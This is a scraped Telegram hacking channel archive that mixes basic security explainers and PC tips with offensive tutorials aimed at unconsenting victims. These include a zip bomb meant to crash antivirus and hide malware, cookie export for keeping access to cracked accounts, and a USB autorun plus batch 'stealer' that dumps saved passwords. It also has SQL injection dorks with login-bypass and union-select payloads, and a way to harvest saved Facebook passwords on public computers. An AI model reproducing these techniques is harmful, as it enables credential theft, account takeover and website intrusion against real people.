Hacking And Cryptocurrency For Beginners
前往频道在 Telegram
1 258
订阅者
无数据24 小时
-47 天
-2030 天
帖子存档
What is a Security Threat?
- As an ethical hacker , your daily routine will include dealing with a bunch of security threats.
Any risk that has the potential to harm a system or an organization as a
whole is a security threat. Let’s go over the types of security threats.
Types of Security Threats
Threats are of two types:
1 Physical Threats
Physical threats are further divided into three categories.
-Internal e.g. hardware fire, faulty power supply, internal hardware failures
etc
-External e.g. floods, fires, earthquakes etc
-Human e.g. vandalism, arson, accidental errors etc
2 Non-Physical Threats
Non-physical threats include every threat that has no physical
manifestation. They are also known as logical threats. Below is a picture
of the most common non-physical threats:
An ethical hacker generally deals with non-physical threats on a daily
basis, and it is his responsibility, to come up with preventive measures for
these threats.
@learnhackingtricks
What is Ethical Hacking?
The act of hacking is defined as the process of finding a set of
vulnerabilities in a target system and systematically exploiting them.
Ethical Hacking as a discipline discerns itself from hacking by adding a
vital element to the process – ‘consent’. The addition of ‘consent’ to
this process serves two objectives –
The process becomes a legal activity
Since the ethical hacker takes permission prior to hacking into a system,
it is legally made sure that he has no malicious intent. This is normally
performed by making the ethical hacker sign contracts that legally bind
him to work towards the improvement of the security of the company
An ethical hacker - is a computer security specialist, who hacks into a
system with the consent or permission of the owner to disclose
vulnerabilities in the security of the system in order to improve it. Now,
let us go over the roles of an ethical hacker in this ethical hacking
tutorial.
@learnhackingtricks
---- Which antivirus software should I buy? ---
There are a lot of antivirus software vendors who offer even more
antivirus software. It is advised to go with proprietary antivirus
software instead of free software. The paid antivirus software offers
better protection to infections, exploits and hackers than free virus
scanners. Currently the award winning antivirus vendors are
Bitdefender, ESET, Norton, F-Secure and Kaspersky.
In the upcoming days we will make a list of antivirus vendors with
some promotion codes for a discount and share them with you in
this article.
@learnhackingtricks
--- False-positives ---
One big downside of heuristic based virus detection are false
positives. False positives is when antivirus flags files or programs as
malicious or marks them as a threat when they are not, it is just a
false alarm. In normal daily use of your computer you should rarely
encounter false positives. But with so much software around it may
be possible to run into a false positive. In general it is advised that if
your antivirus software claims a file to be malicious, consider it
malicious too. If you want to be 100% sure if you’re facing a false
positive, you can upload the file to VirusTotal for analysis. VirusTotal
will scan the file for you and show you how other antivirus software
think about its contents.
@learnhackingtricks
---- Heuristics ----
Heuristic bases detection is used in combination with virus definitions
to detect malware which is based on known and modified malware.
Even without virus definitions for the modified malware the antivirus
software is able to recognize variations of malware and put it in
quarantine. Antivirus uses generic signature detection for this
purpose and can be explained as malware with different fingerprints
but exactly the same malicious code. Another method for antivirus
software is file analysis for example to see if an executable has
instructions to alter or delete certain files. Regular software does not
try to modify or delete important system software and therefore this
action could be considered malicious behaviour and should therefore
be considered malware.
@learnhackingtricks
---- Virus definitions ----
Antivirus software relies heavily on
virus definitions to detect malware on
your system and this is the most traditional way of detecting
malware on your system. Virus definitions contain signatures which
are used to determine the kind of malware. New malware is
released every day and so are virus definitions. The bigger antivirus
software vendors have dedicated antivirus labs where new malware
is researched to develop new definitions and signatures for them.
This is a costly process because millions of new malicious software
is released every year. Without the latest virus definitions it may be
impossible for your antivirus software to detect the latest malware.
Most antivirus software vendors update malware definitions multiple
times a day for this reason. Another method for antivirus software is
heuristic based detection which we will explain in more detail.
@learnhackingtricks
How does antivirus software detect viruses?
what mechanisms does antivirus software uses to detect a virus
and distinct them from non-malicious files? This is done by using
virus definitions for known viruses and by employing heuristics to
detect new or modified viruses. Read on to know what virus
definitions are, how antivirus uses them to detect malware and how
antivirus employs heuristics.
@learnhackingtricks
What is Zip Attack ???
❌Warning❌
This post is only for Knowledge & Educational Purpose only. we are not responsible for your illegal activity
Zip bombs are very small files, that when unzipped, can expand from some few kilo bytes to thousands of terabytes, they are usually used to take out antivirus software.
Zip bombs of course has a single base, a text file containing only 0s Usually that text file is 4GB, written in either notepad or wordpad, how you make a Zip File is explained below
Steps:-
➦Open notepad or word pad and write in 1000 zeros and then you should have a text file of about 1Kb
➦Now use the CTR+A, CTR+C, CTR+A buttons on your keyboard to select all, copy the selected and then paste it(respectively)
➦Repeat step 2 until your text file becomes 4GB
➦Now save the text file under any name with of course a .txt extension, so now you have a 4GB text file containing only of zeros
➦Now Compress this text file into a zip file(This will be our base) let's call it zip1
➦Now copy this zip file(zip1) 17 times and now you will have 17 copies of the original zip1 file, and now zip all these zip1 files into 1 zip file let's call it zip2, now zip2 contains 17 zip1s
Now make 17 copies of zip2 and zip it into zip3
➦Now continue step 6 until you have gone to zip5 or 5 layers, each containing 17 zip files
Now you know how to make a zip bomb, here is how it's used, hackers place zip bombs near their malware, so the zip bomb acts as a bait and the anti virus tries to open this zip file but then gets 17 smaller zip files and opens them, and the size increases unexpectedly fast and the antivirus will either crash or stop opening these zip files and temporarly shut down, now the Malware will do its magic...you can use this file to annoy your friends and for professional hackers use this trick to hide your malwares don't open this on ur pc
@learnhackingtricks
🔰 Telegram Now Allows You to Delete All Your Private Messages Anytime from both Sender & Receiver 🔰
🔻Telegram now landing into the peak of the privacy and let users delete their entire private messages from both sender and receiver side regardless of the time limit.
Telegram is one of the most trusted platform and the one who is continuously fighting for users privacy in order to provide extreme comfortability within the platform.
➖ @learnhackingtricks ➖
How to Keep cracked account with you after the owner change Password
TO DO THIS, YOU HAVE TO DO FOLLOWING STEPS WHEN YOU GET THE ACCOUNT :~
➦Step 1 - Log in to the cracked account
➦Step 2 - Download Cookies Editor extension for Chrome
➦Step 3 - Go to the homepage of the cracked account website
➦Step 4 - Click on the extension at the top of the search bar on the right
➦Step 5 - Click on export
➦Step 6 - Paste the cookies in a txt file
WHEN THE OWNER OF ACCOUNT CHANGED THE PASSWORD THEN DO FOLLOWING STEPS
➦Step 1 - Copy the cookies from your txt files
➦Step 2 - Click on the extension at the top of the search bar on the right
➦Step 3 - Click on import
➦Step 4 - Past your cookies and click Done
➦Step 5 - Refresh
@learnhackingtricks
Trick to Unlocking the Micro SD/Memory Card is Here
Download and Install the ES File Explorer App from Playstore.
🌑Enter the Password protected Memory Card/SD Card on your Android phone.
🌑Open ES File Explorer App and Go to System Folder.
🌑In System Folder you will find a MMCSTORE file.
🌑You have to rename the file as mmcstore.txt.
🌑Now open file and you will find your Memory/SD card password there.
Now you can visit the phone by which the memory card is locked.
Go to Password Remove option and put down the password you got in a text file.
@learnhackingtricks
Tutorial on how to make a USB stealer. Basically with a functional stealer you can plug it into any persons PC and steal all their saved passwords, etc
No need for:
-__Hosting__
-__Software__
-__Crypting__
TUTORIAL:
Open notepad/wordpad
type:
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
save this as AUTORUN.inf
open a new notepad/wordpad document
type:
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start PasswordFox.exe /stext passwordfox.txt
start OperaPassView.exe /stext OperaPassView.txt
start ChromePass.exe /stext ChromePass.txt
start Dialupass.exe /stext Dialupass.txt
start netpass.exe /stext netpass.txt
start WirelessKeyView.exe /stext WirelessKeyView.txt
start BulletsPassView.exe /stext BulletsPassView.txt
start VNCPassView.exe /stext VNCPassView.txt
start OpenedFilesView.exe /stext OpenedFilesView.txt
start ProduKey.exe /stext ProduKey.txt
start USBDeview.exe /stext USBDeview.txt
save this as LAUNCH.bat
copy the autorun and launch file to your USB
go to http://www.nirsoft.net/ and download the programs named in Step 2
extract the files you downloaded to your desktop and copy all the .exe files to your USB
remove and re-insert your USB
click on the option perform a virus scan
(this is an example, if you want it to say something else go to the autorun file and change it ;) )
go to my computer---> USB DRIVE and open it
you will now see some text files, if you open them you will see usernames and passwords
NOTICE: This only recovers passwords that have once been saved on your computer.
@learnhackingtricks
How To Post In All FB Group In A Single Click
1) visit this website http://www.hexcolor.in/tools/multipost/index.php
2) login with your facebook account
3) now follow all the requirement and you will see something like that
4) you will see all your fb group and a box fill your message and tick all group click on post.
5) you have done it :)> !!!
@learnhackingtricks
Use FB In Hackers Language
1- Login to your Facebook account
2- Goto account setting
3- search for language Option
4- now set it to "1337 speak" you've done !
if you want to use Facebook in your old language then Roll back the steps and set Language Option to to English (US) again.
@learnhackingtricks
•HOW TO USE PEN DRIVE AS RAM•
1. First of all plug your USB in the USB port and make sure that you do not have any important data on USB.
2. Open your “My Computer” and Right click onto the USB. Which you want to use as RAM.
3. Select “Properties” (the last option) from the drop down menu.
4. A new window will open select “Ready Boost” Tab from there. And tick on the “Use this device” button.
5. Select the space which you want to use for RAM.
6. Finally click onto the “Apply” and then finally “OK” button.
That’s it you have successfully used your USB (Pen drive) as a virtual memory (RAM) for your computer.
@learnhackingtricks
How To Clear DNS Cache in your PC, Mac and Flush Google Public DNS Cache
I’m sure if you are in Blogging businessthen you must have changed hosting provider at least couple of times. Ideally moving site from one hosting provider to another provider might be simple.
But issue is – if you have very large site and multiple contributor then after moving to new hosting provider, before you publish any new post make sure you are serving from new IP address.
It takes some time between 24 to 72 hours to propagate all DNS changes. Your site will be served from both hosting provider for some days.
What if you want to clear your DNS cache on your laptop to see latest changes? Well, with few simple commands you would be able to clear DNS cache.
Step-1
If you have on Mac OS X then just open Terminal window and enter below command to clear DNS flush.
sudo killall -HUP mDNSResponder
Step-2
If you are on Windows 10 then openCommand window and enter below command
C:\Users\Crunchify > ipconfig /flushdns
Above command will Clear, Reset, Flush Windows DNS Cache and Reset in Vista, Windows 7, and Windows 8, Windows 10.
Step-3
If you are on Linux environment then open Shell terminal and enter below command
sudo /etc/init.d/dns-clean start
Step-4
Flush Google Public DNS Cache.
Just follow https://developers.google.com/speed/public-dns/cache URL and enter your site name and flush A or CNAME records.
@learnhackingtricks
PLEASE BOOKMARK THIS
Google drive movies - https://drive.google.com/drive/u/0/mobile/folders/0B6FjKMQKynZILTlwZHl4ajUwcFU
Programming language collection on google drive - https://drive.google.com/drive/folders/0ByWO0aO1eI_MN1BEd3VNRUZENkU
Books -
https://drive.google.com/drive/folders/0B0hgUX3me1_RNi1KTXBzXzdXSzA
Google drive hacking ebook collection - https://drive.google.com/drive/folders/0B-JzQsKoJaANbTFGN0RWLWhONms
Books for reading - https://drive.google.com/drive/folders/0B09qtt10aqV1SGxRVXBWYmNIS2M
Books (novels) - https://drive.google.com/drive/folders/0B1v9Iy1jH3FXdlNDeUNHNEVsZlE
Books - https://drive.google.com/drive/folders/0B1Ef5shqGHDNRGEwd3BYb0N3Um8
C programming tutorial google drive - https://drive.google.com/drive/folders/0B1qoi1IlEKwaM2tSMFBmOGUyNzg
Udemy course google drive link - https://drive.google.com/drive/folders/0B1HQDi7EkA9XNlR3STF5SVJIVUk
Programming books google drive - https://drive.google.com/drive/folders/0B2iEK7PB5AR-b01obXBHWHVHQzg
Linux books - https://drive.google.com/drive/folders/0B1Wzf8eTK3LTYWtqOGlnQldTV2c
4K wallpaper google drive - https://drive.google.com/drive/folders/0Bx2Vez2N3qd7SGxkejRhQmdKQlk
https://drive.google.com/drive/folders/0B2VhgL11XGQoamJCNGprcUJ2Zms
Books for reading - https://drive.google.com/drive/folders/0B_qpgvDTe8kraTQ2QkM2S19tQWs
Books - https://drive.google.com/drive/folders/0B4PtWlBoZ1rVSncxbi1JVFY4anM
Best collection google drive - https://drive.google.com/drive/folders/0B3Qd1rlyIyR5bHo0dENpM1lSclk
Banking exam preparation papers - https://drive.google.com/drive/folders/0B079Cm0MfQeyS3R5cHVnb2RVUU0
Learning awareness banking lecture - https://drive.google.com/drive/folders/0B8CnCCd60bnzM3VSWFhKZ2Rzc2s
Head first programming book collection - https://drive.google.com/drive/folders/0B1W3DeV5S5BELXZRajkteW83WHM
IBPS book collection for banking - https://drive.google.com/drive/folders/0B4xFnW1qvXXgZnVkaUVEX2w4Zzg
Reading material - https://drive.google.com/drive/folders/0Bx_3I5qjqu3rSVBWMHpjLVRoREE
300 medical books - https://drive.google.com/drive/folders/0BzQUrkcZOjAiYmQ0NTBjZmMtMDJjMS00OWViLTk0NWEtYTFhYzE2ZTZmYzdk
[Udemy] the complete digital marketing course - https://drive.google.com/drive/folders/0B-M90IqpPfRHNXZ6SkdMQlZOUkk
Arduino step by step - https://drive.google.com/drive/folders/0B0TIoKgqQ9p5WC1pV2I0aHlKamc
All type books - https://drive.google.com/drive/folders/0B1dv5sqSPsPbfk1ZSXNud1pvWl9BV2Franh2ZFl0S0hweTBhT3QyNFUxWGgzQkFpOGUtd0k
Mechanical engineering books - https://drive.google.com/drive/folders/0B1k2RCDnejGvNFZWTWhJeDctWDQ
Study books - https://drive.google.com/drive/folders/0B6hG9OOiP0g2Zkh4M2x3WnVJNWs
English - https://drive.google.com/drive/folders/0B5xOSW6DBC5LfkVZWTJqYUZOblgyQnlhSlc2U1RJWUFyWjBnUXc0dHlrTHR5dEUySXNYc0E
English grammer - https://drive.google.com/drive/folders/0B1_NUA4_UggJYUIwc09LX1dfcDA
GMAT, GRE, TOEFL, IELTS & LSAT - https://drive.google.com/drive/folders/0B2jZERjUXCHhZnB5T0tpY2ZyRmc
Html essential training - https://drive.google.com/drive/folders/0B3LfaGUUk6tiT18xZDRBY1FCVXc
Lynda courses - https://drive.google.com/drive/folders/0B5eJ2fw2iba1UlZna0FUWXF4UFU
Mathematics - https://drive.google.com/drive/folders/0BzeyVSBfx9yaWUMtUXZNLU9kM0k
Php development course - https://drive.google.com/drive/folders/0ByWO0aO1eI_MV0lhX1dkUlQ3YUk
Programming books - https://drive.google.com/drive/folders/0B2iEK7PB5AR-b01obXBHWHVHQzg
@learnhackingtricks
Enjoy 👍🏼
What is SQL Injection?
SQL injection attack is a code injection technique or method, which is used to attack data driven applications. In this attack, malicious SQL statements are inserted in entry field for execution. SQL injection attack (SQLIA) is considered one of the top web application vulnerabilities. By using SQL Injection method it is very easy to hack vulnerable website. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database.
Using SQL Injection attack method an attacker can get complete DB of website and User ID and Password can be exploded, an attacker can also Shut down My SQL Server and Server will stop working. An attacker can modify content of website and bypass login.
Requirements :-
• SQL Injection Dorks.
• Vulnerable Website.
• Firefox with Hack bar add-on.
• Little bit understanding of SQL
• Fresh Mind to Understand it.
Step 1. Find Vulnerable website.
An attacker always use Google, Bing or Yahoo search engine for searching SQL Injection Vulnerable websites using Dorks. (SQL Injection vulnerable URL is called Dorks which can be easily found in SQL Injection Vulnerable Website URL)
First you search the admin page of vulnerable web site. For searching vulnerable web page you take the help of google . Open your google page and use following script.Use any one of the following…
► “inurl:admin.asp”
► “inurl:login/admin.asp”
► “inurl:admin/login.asp”
► “inurl:adminhome.asp”
► “inurl: admin.php”
► “inurl: login/admin.php”
► “inurl: admin/login.php”
► “inurl: login/administrator.php”
Now you can use the following code and inject into user id and password field. For user id used admin as user id.
And in password field use one one of the following code and some times these codes are also used for both user id as well as password.
• test’or1–
• ‘or 1=1#
• 1’or’1’=’1
• ‘)or1=1—
• ‘or ” = ‘
• ‘or’1’=’1
• ‘ or ‘1’=’1
• ‘ or 0=0 —
• ” or 0=0 —
• or 0=0 —
• ‘ or 0=0 #
• ‘or’ ‘=’
• ‘or’1=1’
• “) or (“a”=”a
• ‘) or (‘a’=’a
• ” or “a”=”a
• ‘ or a=a–
• or 1=1–
• ” or 1=1–
If found no luck with this method then try given below.
How to Check for Vulnerability.
To Check the Vulnerability put sigle Quote ( ) at the end of the website URL and Hit Enter.If the page remains same or Not found then its not vulnerable and if the page shows Error like this :-
An error occurred...You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near /contentPage.php?id=8 at line 1
This means the website is vulnerable to SQL Injection.
Step 2. Find the number of Columns.
Wooo hoo hoo !! We found SQL Injection Vulnerable webstie now its time to find no. of Columns present in the Database.
To do that replace that one single quote ( ) with Order By no. Statement until you find the Error message.
Change the no. from 1,2,3,4,5,6,7,8,9,..... Until you get an Error Message like Unknown Column
Example:
www.targetwebsite.com/index.php?id=8 Order by 1
If you get an Error on Order by 9 that means the DB have 8 number of Columns
Step 3. Find the Vulnerable Column.
Well we have successfully discovered number of columns present in Database. let us find Vulnerable Column by using the Query Union Select columns_sequence.
And also change the ID Value to Negative, I mean Suppose the website have this URL index.php?id=8 Change it to index.php?id=-8. Just put minus sign -before ID.
For Eg. If the Number of Column is 11 then the query is as follow :-
www.targetwebsite.com/index.php?id=-8 union select 1,2,3,4,5,6,7,8,9,10,11— ✔ And Once if the Query has been Executed then it will display the number of Column. Yeahh.... !!
In the Above result, I found three vulnerable Columns 2,3
Step 4. Finding version, Database and User.
Now this time to find out website Database version and User Just replace Vulnerable Column no. with version()
For Eg.
www.targetwebsite.com/index.php?id=-8 union select 1,version(),3,4,5,6,7,8,9,10,11—
And now Hit Enter
@learnhackingtricks
How To Hack Instagram
Android And IOS
Steps
1 :Go to www.instaleak.net
2 :Click on 'Start Hacking.'
3 :Enter the Instagram account username.
4 :Click "I agree and continue."
And Wait for a while, then simply click on 'Download'!
With this you'll be able to successfully hack someone's Instagram account.
@learnhackingtricks
One of the ways that you can get afacebook users email and password
Assume that you are in an internet cafe.
Open firefox and open facebook and the top you see an lock or secure icon with green color
Click it and click more information
And you can see i think 3 buttons click the button with a word cookies or saved passwords and click show password and you have the email and passwords of users that firefox saved
Some of them may not work because the users may be know they are hacked, but try the first guy, he is not much active.
@learnhackingtricks
